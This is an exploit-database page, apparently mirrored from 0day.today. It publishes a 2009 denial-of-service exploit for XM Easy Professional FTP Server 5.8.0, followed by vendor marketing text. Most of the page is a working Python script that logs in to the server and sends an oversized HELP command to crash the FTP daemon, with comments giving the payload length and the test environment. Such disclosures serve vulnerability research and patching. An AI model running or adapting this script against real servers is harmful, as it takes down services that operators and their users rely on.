Lucene search
+L

XM Easy Professional FTP Server 5.8.0 Denial Of Service

🗓️ 30 Nov 2009 00:00:00Reported by Mert SARICAType 
zdt
 zdt
🔗 0day.today👁 17 Views

XM Easy Professional FTP Server 5.8.0 Denial Of Service vulnerabilit

Code
=======================================================
XM Easy Professional FTP Server 5.8.0 Denial Of Service
=======================================================

# Title: XM Easy Professional FTP Server 5.8.0 Denial Of Service
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mert SARICA
# Published: 2009-11-30
# Verified: yes

view source
print?
# I discovered a denial-of-service vulnerability on XM Easy Professional
# FTP Server product.
# After successfuly logged-in, when you send "HELP AAAA...(4074 times)",
# ftp daemon crashes.
 
# -----------------------
 
# Exploit Title: XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability
# Date: 27.11.2009
# Author: Mert SARICA
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3
 
# XM Easy Professional FTP Server 5.8.0
# Denial of Service Vulnerability
# Note: FTP account is required for exploitation
# http://www.mertsarica.com
 
from ftplib import *
import sys
import ftplib
 
try:
    ftp = FTP('localhost')   # connect to host, default port
except:
    print "Connection error"
    sys.exit(1)
     
try:
    ftp.login()              # user anonymous, passwd [email protected]
except:
    print "Login failed"
    sys.exit(1)
 
packet = "HELP " + "MS" * 2037 # magic packet
 
try:
    ftp.sendcmd(packet)
    ftp.quit()
except ftplib.all_errors, error:
    print("Very good, young padawan, but you still have much to learn...")



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Nov 2009 00:00Current
7High risk
Vulners AI Score7
17